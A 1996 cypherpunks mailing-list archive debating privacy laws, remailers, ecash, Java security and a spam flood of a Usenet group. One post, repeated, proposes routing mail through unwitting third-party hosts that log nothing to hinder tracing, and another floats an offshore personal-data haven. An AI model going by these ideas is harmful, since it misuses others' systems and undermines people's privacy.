Which Donna did I misspell? Donna Hoffman?

--Charles Platt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 25 May 1996 12:17:48 +0800
To: cypherpunks@toad.com
Subject: Re: PILATE SAYETH UNTO HIM...
In-Reply-To: <Pine.SUN.3.91.960524072314.8972A-100000@crl2.crl.com>
Message-ID: <Pine.LNX.3.93.960524174405.604A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Sandy Sandfort wrote:
>  S a n d y
> 
> ...WHAT IS TRUTH?

	Reality viewed through the lenses of Dogma.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 25 May 1996 13:06:12 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <Pine.SUN.3.93.960524121932.657K-100000@polaris.mindport.net>
Message-ID: <Pine.LNX.3.93.960524175148.604C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Black Unicorn wrote:
> On Thu, 23 May 1996, Mike Duvos wrote:
> > > believe that Matt Blaze recently received "The Briefing" and he is
> > > still on our side.
> > Don't suppose Matt could do a little executive summary of 
> > "The Briefing" and post it to the list, could he?
> Probably not unless he wanted to do time.
> I suspect some anonymous person might put bamboo shoots under his
> fingernails and post the results of the interrogation however.

	Isn't this exactly what the anon remailers were designed for?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 25 May 1996 14:55:46 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Truth is equivalent to law?
Message-ID: <01BB499D.2F829240@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Jim Choate

So in your mind truth is equivalent to law? In the sense of the above quote
the 'laws' that are refered to are general observed regularities that we
are capable of understanding. Being a pantheist and hence seeing the entire
cosmos as all there is (and hence divine in toto), I can appreciate the
original intent (being a physicist helps a little bit).
.......................................................................

You know how in science they speak of  "laws of the universe"?

The quote I offered had to with our capacity to know the phenomena of the world (in any amount) and consequently our ability to exert control over these universal forces (or "laws") to whatever degree.  It was not in reference to man-made laws, but to those principles of cause & effect, those natural forces, which have been identified as comprising the elements of existence in the known universe (no one can make verifiable remarks about it beyond that).

It isn't necessary to know the world in toto in order to realize the validity of some of its parts;   we are equipped with the mechanisms and abilities to achieve a useful grasp of what's going on, and what we grasp as being "true" can be satisfactorily distinguished from what is "false" (or a "mistaken assumption").

Nevertheless, the original subject of this thread was about the harmfulness in truth, not with how much of it we can grasp at any time or whether Goedel was incorrect.

I guess your argument is that we can't even discuss the properties of truth, harmful or not, because we can't even be sure that there is any truth in existence.

This makes all your robotics projects bogus exercises in futility, hmm?

The general nature of truth has to do with the difference it makes in the calculations of humans, and the consequences of those calculations upon their lives.  (like, if truth is harmful, should any human being be allowed to use it, speak it, express it, think it; put a crypto envelope around it and send it?)

     ..
Blanc
(sigh)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@kermit.aatech.com
Date: Sat, 25 May 1996 14:52:26 +0800
Subject: Alternative to remailer shutdowns...
Message-ID: <19960524.1408058.131BE@kermit.aatech.com>
MIME-Version: 1.0
Content-Type: text/plain


    There are hundreds of machines littered around the net that
dont bother adding "received" headers to mail.

I dont think that these provide anything near the security and anonymity 
that a single remailer (much less a remailing chain) provide, but it 
seems to me that routing outbound traffic from a remailer through one of 
these sites would provide at least /some/ measure of protection for the 
remailer-operator.

It feels a bit underhanded, but it may be that involving some 
"innocent" bystanders in the remail process would be useful. 
Even if the sites being routed through /were/ keeping logs it would still 
require their participation in any investigation to discover where the 
mail had originated, and this would introduce the question of whether the 
(psuedo)anonymous sendmail host should bear any liability for not
tracking where mail came from. The operator of the particular 
smtp host would seem to have a pretty good defense should a charge be 
raised, but in defending the smtp-host you could also be strengthening 
the defense of the r-ops. 

Another possibility is that rather than operating remailers at all, maybe 
we should be operating non-logging smtp hosts that dont add received 
headers. Building a client to take advantage of these servers would be 
trivial (i wrote one last night, and i am not proficient in C) and it 
could be argued that the situation was not created intentionally to allow 
anonymous messages, merely to preserve disk space and bandwidth.

Flame Away... 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 25 May 1996 14:35:39 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <adcbaec005021004253a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 AM 5/25/96, Hal wrote:

>I think the reason (some) cypherpunks support things like offshore data
>havens isn't that they think it's great to reduce the amount of privacy
>people have.  Why would they support crypto and such if that were their
>motivation?  The real reason is because we expect that such databases are
>going to come into existence regardless of legal efforts.  They may be
>"underground", or for that matter they may be run by governments
>themselves, whom we are supposed to trust with our secrets.

Yes, this is part of it (at least for me, and many others have expressed
similar thoughts).

We all as Cypherpunks know about "security through obscurity." Related
names are: the _illusion_ of security, the "ostrich effect," etc.

(Another key development which informs the CP outlook is the Lotus
experience with their CD-ROM database on zipcodes, names, etc. I think it
was called "Neighborhoods." Privacy advocates bought themselves the
illusion of privacy by getting Lotus to cancel this...even as the data
remained available to corporate, credit, intelligence agency, etc.
customers.)

>The point is that the best countermeasure is to prevent the collection of
>the data in the first place.  Ecash is better than credit cards for this
>reason.  People should try to structure their lives so that as little
>information is leaked about them as possible.  Relying on laws forbidding
>people to keep information they have run across isn't likely to be
>effective.

Indeed, and "privacy laws," besides infringing on the basic freedoms of
people to compile public data as they see fit, give people a "security
blanket" which lessens their motivation to ensure their own privacy through
direct, technological means.

I frankly cannot understand how _any_ member of this list could _ever_
support so-called "privacy laws." Such laws fail to actually ensure
privacy, and in fact give government new avenues for control.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 25 May 1996 17:06:47 +0800
To: cypherpunks@toad.com
Subject: Re: Runtime info flow in Java
Message-ID: <adcc0ddc040210048873@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:09 AM 5/24/96, Lucky Green wrote:
....
>I walked away from your presentation of KeyKOS with the impression that a
>capability system to be secure it would have to be implemented at the OS
>level.
>Can you build a such a system on top of an insecure OS, as Java would have
>to do?
....
I agree with everything that Bill Frantz said. I certainly didn't mean to
imply that a system such as Java could not be secure.

I can't think about a whole system at once. We developed KeyKOS over a span
of several years and we were able to convince the NCSC it had a firm
security foundation. The NCSC convinced us to do some formal descriptions
of our system to articulate some of our previously undescribed programming
patterns. These said in a somewhat mathematical way how capabilities work.
(Like you can't do something to zot unless you have a capability to zot.
etc.)  Object references in C++ and Java pretty much conform to these
capability patterns. In Java you can get an object reference only when you
create the object or some one passes it to you (or you get it thru a shared
variable). In C++ you can also get an object reference by casting and other
chicanery.

None of these formalities seemed the least bit surprising. There was no
deep mathematical insight here. It was merely restating the familiar in
very different terms. The exercise did lead us over some old territory with
new eyes and we saw some easily eliminated covert channels that we had been
unaware of.

We do not have a complete map between capabilities and Java. There are
things about Java that we have not mapped to capabilities yet. For instance
any piece of code in a Java program that can declare a reference to an
object of classs Zot is also able to invoke any of the public constructors
for Zot. This may be too strong an ability. (In KeyKos you could create a
zot just in case you held the capability to the zot creator.) Perhaps you
put all of the constructing code in static methods for Zot and make all
constructors private. It is important that some code be able to construct
Zot instances that other code is unable to construct.

Java's security manager classes are not capability like. They seem to us
too much like merely a series of plausible decisions for which we can see
no general principles. Each decision makes sense but we have no feeling
that they are complete.

I suppose that the above sounds as if I am saying "Trust us. We know all
about security.". Unless the end user is able to understand just what the
lattitude that the applets in his machine have, he has no security. Java
will not be secure until the security principles can be understood by the
intelligent end-user. I think that you must make graphically explicit which
agents in the computer have access to the phone. You may be keeping secrets
because untrusted agents can't phone home, or because they can't see the
secrets. Current user interface design is predicated on the idea that such
issues should not concern the end user. I dearly wish that when some
application in my Mac complains that it can't get the phone, there were a
way for me to find out who was using the phone and take it away from him. I
would also like to easily deny applications access to the phone. Even more
I would like to explicitly grant phone access to an application just as I
must plug my modem into the phone line before it can transmit bits from my
house. In such a system I could begin to reason about where the secrets
were going or why things didn't work.

Access to the phone should be via a capability. The same goes for TCP
connections, the ability to send a user data gram to a given IP address.
Access to a random stream of bits should be via a capability. Access to a
particular file or directory should be a capability. etc. etc. Everything
should be a capability!!!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 25 May 1996 16:40:35 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Children's Privacy Act
In-Reply-To: <01I53IY1L6BG8Y4Z90@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960524181903.29645f-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, E. ALLEN SMITH wrote:

> 	Why, pray tell, _should_ someone be able to conceal that they declared
> bankrupcy - e.g., ran out on their debtors that they had freely contracted to
> repay - more than 7 years ago? Should prison terms to theft be limited to 7
> years?

I think forgiveness, within reason, tends to have a positive economic
effect. I'm not the same person I was seven years ago, or even seven
months. (Is it 7 years, btw? Or was it 12? It's arbitrary, in any case.) 

I have no objection to allowing someone to become, and remain, a
productive member of society years after fucking up badly. Note there are
no statutes of limitations and no forgive-and-forget mandates for the more
heinous violent crimes.

> 	Moreover, there are significant negative economic impacts for
> criminalizing the possession of such information. The above is one instance;
> another, which is even more of interest to me due to my profession, is that of
> genetic information and insurance. Genetic screening for insurance purposes
> decreases the risk to an insurance company.

Someone once said something about giving up a little freedom in return for
security.

How far does this go? Do you want your insurance company controlling your
life? "Managed care" is bad enough. I'm willing to pay a little more into
the risk pool if it means I don't have to submit to a DNA test, and don't
have to submit all of my grocery purchases for nutritional review, and
don't have to be fingerprinted, and don't have to tell them the details of
my sex life, and don't have to tell them every time I walk outside without
wearing sunscreen.

OK, that's a straw man. The last couple examples show why some laws aren't
necessary. The market simply wouldn't accept a too-totalitarian insurance
company; people would rather pay as they go, and accept the risk
themselves. But why is it fair to discriminate against detectable risks,
when undetectable risks may be more expensive? 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@kermit.aatech.com
Date: Sat, 25 May 1996 15:53:10 +0800
Subject: Alternative to remailer shutdowns...
Message-ID: <19960524.1408058.135B8@kermit.aatech.com>
MIME-Version: 1.0
Content-Type: text/plain


    There are hundreds of machines littered around the net that
dont bother adding "received" headers to mail.

I dont think that these provide anything near the security and anonymity 
that a single remailer (much less a remailing chain) provide, but it 
seems to me that routing outbound traffic from a remailer through one of 
these sites would provide at least /some/ measure of protection for the 
remailer-operator.

It feels a bit underhanded, but it may be that involving some 
"innocent" bystanders in the remail process would be useful. 
Even if the sites being routed through /were/ keeping logs it would still 
require their participation in any investigation to discover where the 
mail had originated, and this would introduce the question of whether the 
(psuedo)anonymous sendmail host should bear any liability for not
tracking where mail came from. The operator of the particular 
smtp host would seem to have a pretty good defense should a charge be 
raised, but in defending the smtp-host you could also be strengthening 
the defense of the r-ops. 

Another possibility is that rather than operating remailers at all, maybe 
we should be operating non-logging smtp hosts that dont add received 
headers. Building a client to take advantage of these servers would be 
trivial (i wrote one last night, and i am not proficient in C) and it 
could be argued that the situation was not created intentionally to allow 
anonymous messages, merely to preserve disk space and bandwidth.

Flame Away... 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 25 May 1996 16:30:21 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <199605250142.SAA27683@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:14 PM 5/24/96 EDT, Paul J. Bell wrote:
>Right, someone tells your wife that you are sleeping with someone else.
>The truth, does it hurt? (-:

Let's ask John Bobbit, shall we?  Ouch!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 25 May 1996 15:45:11 +0800
To: "'cypherpunks@toad.com>
Subject: FW: INTERNET NETWORK PROFESSIONALS
Message-ID: <01BB49A7.15260580@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


This was posted to a local mailing list;  I thought some of you might be interested.

     ..
Blanc

----------
From: 	Herbert Edelhertz[SMTP:edel@halcyon.com]
Sent: 	Friday, May 24, 1996 16:08
To: 	seasigi@halcyon.com
Subject: 	INTERNET NETWORK PROFESSIONALS

>Date: Fri, 24 May 96 11:56:09 CST
>From: "Sharon M. Hughes" <smhughes@dttus.com>
>To: edel@halcyon.com
>Subject: INTERNET NETWORK PROFESSIONALS
>X-UIDL: d791369eb8aa0a0d02201d3a635acbd5
>
>     Herbert,
>     
>     My name is Sharon Hughes and I am a recruiter at Deloitte & Touche 
>     Consulting Group.  We are looking for Internet Network 
>     Developers for a new start-up venture in Chicago.
>     
>     I would like to post this ad with the Internet SIG, Pacific Northwest 
>     Users Group.
>     
>     Your assistance to this matter is appreciated.
>     
>     Thank you, 
>     
>     Sharon Hughes
>     
>     _________
>     Internet Developers for Startup Opportunity
>     
>     Deloitte & Touche Consulting Group is the Management Consulting  
>     Services division of Deloitte & Touche LLP, the worldwide accounting  
>     and professional services firm.  We have over 2,700 consulting 
>     partners and staff in the US and over 6,000 worldwide. 
>     
>     Deloitte & Touche Consulting Group is looking for Internet gurus 
>     (multiple positions open) for a fully funded startup with tremendous 
>     growth potential, starting immediately.  The positions are located in 
>     a northern suburb of Chicago.  
>     
>     Specialists are required with implementation experience in Electronic 
>     Commerce and the Internet in the areas of e-mail integration, 
>     encryption, authentication and secure transport over the Internet.  A 
>     minimum of three years experience in one or more of the following 
>     three areas is necessary, in addition to object-oriented development 
>     in C++ on Unix (Solaris).  Unix inter-process communications, 
>     distributed computing software development and optimization a plus.
>     
>     Internet Transport/Security: TCP/IP, HTTP, FTP, SSL, CGI, IPSET,
firewalls 
>     E-mail: e-mail integration, SMTP, MIME, S/MIME, MAPI, SET, X.509 
>     directory services, LDAP, X.500
>     
>     Encryption: RSA, PGP, PEM, MOSS, integration of encryption 
>     technologies
>     
>     Experience in HTML, Web Servers and Web Home page creation only, 
>     without development experience in other areas will not be adequate 
>     qualifications.
>     
>     Minimum educational requirement is a B.S., with M.S. preferred.
>     
>     
>     Please submit resume to:
>     
>     Sharon Hughes
>     Deloitte & Touche Consulting Group
>     180 N. Stetson, Chicago, IL  60601.
>     
>     Tel. (800)895-0469                                                     
>     Fax  (800)895-0465
>     Internet: smhughes@dttus.com
>     
>
>
>








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 12:04:02 +0800
To: declan+@CMU.EDU
Subject: Re: FTC online workshop on privacy
Message-ID: <01I53FTZQTS08Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 23-MAY-1996 09:57:37.53

>More to the point, the left and the right come together on privacy issues.

>Remember the Christian Coalition's take on national ID cards? "Mark of
>the Beast!" (Does anyone have an original cite for this? I also recall
>the CC opposing Clipper...)

	Yes, even the CC types can get some things right. Take a look at the
opposition to the Anti-Terrorism bill, for instance. Quite a few militia
organizations are Christian fundamentalist in orientation (unfortunately); they
were in alliance with the ACLU in opposing it.
	However, the objection to banning address lists of interference with
private business still stands, so long as the addresses are not gotten from
governmental or quasi-governmental (e.g., allowed/regulated monopoly/ogliopoly)
sources.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 12:20:23 +0800
To: hendersn@zeta.org.au
Subject: Re: Long-Lived Remailers
Message-ID: <01I53G3L1NBU8Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hendersn@zeta.org.au" 23-MAY-1996 11:35:09.98

>I really like this idea. How about instead of a full-scale remailer being
>the final jump of the message, you have a _very_ simple remailer set up
>along the lines of anon.penet.fi. No encryption, just strip off the headers
>and send the message to its final destination. Sorry for being clueless in
>how this works(I'm learning as fast as I can), but wouldn't this kind of
>system be incredibly easy to start up and fold? You could have a host of
>such final emanation points winking in and out of existence while the actual
>encrypting remailers remain relatively safe.

	Well, an anon.penet.fi one has the disadvantage of not encrypting
between the final sendings.... which means that it's relatively easy to trace
back a given message to whatever remailer sent it, via traffic monitoring.
A forwarding remailer that decrypted mail according to a published key would
get around this, especially if it were being run out of a POP or other email
forwarding account (otherwise, the operator of the system could just look and
see what the private key was, and thus be able to trace back).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 11:49:40 +0800
To: iang@cs.berkeley.edu
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <01I53GAYSQUC8Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"iang@cs.berkeley.edu" 23-MAY-1996 13:56:31.71

>Ah.  I see I was misunderstood.  The goal was not to make the shop anonymous,
>but rather to be able to provide change to an anonymous payer.

	I had thought that the basic purpose of the fully anon system was just
that - full anonymnity for payer and payee. Under your suggestion, the shop
gives up this anonymnity under these circumstances in order to be able to make
change. I'm not sure if I would call that a very good tradeoff...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 12:48:37 +0800
To: gelmanl@gwis2.circ.gwu.edu
Subject: Re: Children's Privacy Act
Message-ID: <01I53GHKZH1M8Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"gelmanl@gwis2.circ.gwu.edu"  "Lauren Amy Gelman" 23-MAY-1996 14:26:28.11

>The text of the Children's Privacy Protection and Parental Empowerment 
>Act is available at the Epic "Children's Privacy" web site:

>http://epic.org/privacy/kids/

>Read it before you trash it!

	I have examined it; I see no reason to change my stated opposition
to it. Quite simply, it is an invasion of the privacy rights of businesses to
force them to turn over such information as the law demands they turn over; it
is an invasion of the property rights of businesses to mandate what they do
with the information they have received and consequently own.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 13:19:29 +0800
To: sunder@dorsai.dorsai.org
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I53H8LBTAG8Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sunder@dorsai.dorsai.org"  "Ray Arachelian" 23-MAY-1996 16:51:17.15

>One flaw in this is that some systems (my isp, dorsai, included) shut off 
>the finger daemon for security reasons.  In this case, the remailer 
>should store the anonymous message on its hard drive for upto a week and 
>send a notice message to the target asking them if they want to receive 
>the email or not, and how to deal with future anonymous requests  The 
>remailer then has to keep a table of those recipients for whom finger fails.

	One other reason to have such a voluntary message is to account for
users/nyms who wouldn't want that they receive anonymous messages to be made
public. For instance, that would clue in someone that they might have a nym
at a nym-server, thus narrowing down the field for traffic analysis and
forensic stylology.

>While this is going to eat up a bit of space on the remailer, space could 
>be limited for the user, etc.  If the space on the server runs out, what 
>do you do?  The remailer should still inform the target, but again a 
>policy question rises - does the remailer send the message anyway, does 
>it delete the message but inform the target that "Sorry dude, you had an 
>anonymous email, but I had no room to store it and so I delted it.  IF 
>you don't want it delted the next time around, activate finger tags 
>thusly, or send a reply to this message with "Accept Anonymous Email" or 
>"Reject Anonymous Email" as the subject and I'll respect your wishes from 
>now on"???

	The latter has the advantage of preventing spamming via flooding the
remailer.

>Another thought is that we could set up some universal remailer allow 
>fingering service where the remailers can use some server somewhere or a 
>list of servers somewhere to look up a user's email address and see if 
>they are willing to receive anonymous email.  Sort of like PGP key servers.

	The possible problem of improper information going out (as per the
finger idea) is also the case with this one.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 25 May 1996 15:22:01 +0800
To: cypherpunks@toad.com
Subject: Another attack on alt.religion.scientology
Message-ID: <2.2.32.19960525031459.0069eab8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone has launched another attack on the Usenet group
alt.religion.scientology.  In the last five days, hundreds of
messages have been posted to a.r.s. in what many presume to be
yet another attempt by CoS to stifle criticism and shut down
the newsgroup.

The first poster used the return address "Chris Maple" <chrismpl@
a.crl.com>, and made use of a mail gateway at Yale.  The Yale
admins closed the gateway to the spammer, but several hundred
posts had already made it through (I got at least 400 here).  I
believe the Yale admin said that 800 more attempts were made to
post to a.r.s. after the gateway had been closed.  Since then,
"Chris Maple" has been followed by several other vertical spammers,
all posting similar material, even formatted the same -- same
intro and URLs at the end.

As each new vertical spammer shows up we contact their ISP,
but by the time anything happens we have several hundred more
messages.  The group has been flooded with spam for about five
days straight.

While there is no direct evidence, AFAIK, that CoS is responsible
for the attack, it is consistent with their ongoing attempts to
silence their critics, including lawsuit, harassment by private
investigators, rmgrouping a.r.s., and (presumably) shutting down
hacktic.  Please let others know about what's happening, and feel
free to repost this message in appropriate forums.  



Thanks,

Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 13:25:13 +0800
To: llurch@networking.stanford.edu
Subject: Re: FYA: "The ANOREV INTERCEPTS" [Usenet censorship] (fwd)
Message-ID: <01I53IIPRK9S8Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 24-MAY-1996 01:09:35.99

(quoting tallpaul)

>Because of the role I played in the campaign to get people to VOTE NO
>on "rec.music.white-power" many people have sent me e-mail asking about
>the vote results on several political news groups on the internet. The
>following is the latest data available as posted in the official USENET
>news group called "news.groups".

	Oh? And were you, tallpaul, behind the mailing to uninvolved mailing
lists of politically-biased pleas to vote "no" on that group, sans a copy of
the CFV? If I had had time, I would have voted in favor of it on those grounds.

>R. Graves was the original proponent of TPN-S. He had opposed the
>earlier RMW-P group but on technical, not political reasons, and he
>does, as he once put it, "not consider [himself] anti-racist." Rather
>Graves opposition centered on whether the nazi news group had
>demonstrated sufficient interest as a music group, whether it had been
>properly proposed in terms of proper USENET/uunet electronic paperwork
>at the like.

	I have read over the proposal in question, specifically its latter
version. It has a robomoderator that attempts to reach the laudable goal of
reducing inappropriate crossposting by persons arguing on this issue. While I
have my doubts about how effective this is likely to be (looking for whether
approximately identical posts with the same subject line had been posted to
the excluded groups would probably be necessary, to prevent spamming tactics
from being used), it is a valid goal.

>Highly skilled technically, Graves seems quite clueless about the
>nature of fascism as a political tendency off the internet in the real
>world. He has opposed individual cybernazi dirty tricks in cyberspace,
>including some first-class technical tracking of cybernazis using
>anonymity and other devices to hide their identities. On the other
>hand, he has announced, for example, that there are only some one-to-
>two thousand hardened nazis in the entire world.

	To my knowledge, Rich has not opposed anonymnity; indeed, he has
praised anonymnity as needed on groups such as alt.revisionism. I would be
interested in hearing whether tallpaul supports anonymnity; it appears to be
on-topic for cypherpunks. (Interestingly, the address from which various
non-political mailing lists were sent the aforementioned improper email was
either quickly shut down or the product of email header faking, according to
the results I got when I emailed the person back with a letter of protest.)
	I would also suspect that tallpaul may be biased on his estimates of
the number of full-blown nazis in existence, although this admittedly depends
on definitions; activists are prone, often innocently, to overinflate the
problems with which they deal. (I refer interested parties to the statistics
on rape customarily used by those promoting action against it; they typically
include such occurrences as sexual harrassment - a usage of free speech. While
I disapprove of sexual harrassment and tend to regard rapists as proper
subjects for the death penalty, I wish activists would be more accurate in
their statistics.)

>Graves's new view threatens additional ominous organizing by cybernazis
>on the net as they go for an additional news group even before the
>results of their previous organizing effort is announced.

	Cybernazi organizing is an inevitable consequence of the ability of
all minority political groups to organize better thanks to the Internet. They
have as much right to organizational activity as anyone else - including
anti-fascist activists such as tallpaul. I would suggest reading over some
issues of CuDigest with my contributions in them for further discussion on this
matter.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 25 May 1996 14:20:19 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <9605241714.AA04977@sherry.ny.ubs.com>
Message-ID: <Pine.LNX.3.93.960524204803.878A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Paul J. Bell wrote:

> Right, someone tells your wife that you are sleeping with someone else.
> The truth, does it hurt? (-:

	Not as much as finding out by catching gonherea, however you spell
it. 
	In this case it isn't the truth hurting, but rather the lies and
broken promises.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 13:27:58 +0800
To: llurch@networking.stanford.edu
Subject: Re: Children's Privacy Act
Message-ID: <01I53IY1L6BG8Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 24-MAY-1996 04:18:17.16

>I recognize that criminalizing the free flow of information is like trying
>to stick your finger in a dike, but every little bit has an effect. In
>this case, I'd call it a positive effect. 

	That's funny, most people would call the German action to censor
pro-nazi information a criminalization of the free flow of information with
a positive effect.

>I was certainly disappointed to hear a couple of cypherpunks the other day
>discussing for-profit offshore data havens full of personal information
>that is illegal to collect in the US as a business opportunity *they* were
>interested in pursuing. I just can't see myself doing that, for anybody.
>Gubmint or private, doesn't matter.

	Why, pray tell, _should_ someone be able to conceal that they declared
bankrupcy - e.g., ran out on their debtors that they had freely contracted to
repay - more than 7 years ago? Should prison terms to theft be limited to 7
years?
	Moreover, there are significant negative economic impacts for
criminalizing the possession of such information. The above is one instance;
another, which is even more of interest to me due to my profession, is that of
genetic information and insurance. Genetic screening for insurance purposes
decreases the risk to an insurance company. It is therefore possible to issue
insurance with less of a pool backing it up (for claims in insurance, for
bad debt in the case of credit). This increases the number of businesses who
can get into a given market, which will decrease prices for insurance since
the current insurance business is quite ogliopolistic. Thus, for the average
individual the availablility of such information is beneficial.
	I would personally be interested in setting up some such business in
the future, specifically one with a genetic screening lab. While I would not
wish to devote my entire time to it, I would be quite willing to help with
setup and updating it - if paid a fee, of course.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 14:29:54 +0800
To: cypherpunks@toad.com
Subject: Society and the Future of Computing Conference
Message-ID: <01I53IYZMWGY8Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 24-MAY-1996 05:04:37.21
Subject: Society and the Future of Computing '96

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 22 May 1996 16:14:13 -0600 (MDT)
From: Rick Light <rxl@lanl.gov>
Subject: Important_SFC_Update


   <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

   		 Society and the Future of Computing '96
                  June 16-19, 1996, Snowbird, Utah, USA

           		http://www.lanl.gov/SFC

   <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

	The conference structure includes keynote speakers, 
	panels of invited speakers, Net-connected poster 
	presentations, debates, and workshops. The intent is 
	to share ideas in a diverse multidisciplinary environment for 
	mutual enrichment and learning, ultimately to affect 
	the directions of computer science research and applications 
	for the benefit of all.  

	See the conference Web site for details and to register.


Contents:
---------
	* Registration Still Open!
	* Diverse Keynote Speakers Featured 
	* Unique Workshops Offered
	* Outstanding Agenda 


Registration Still Open!
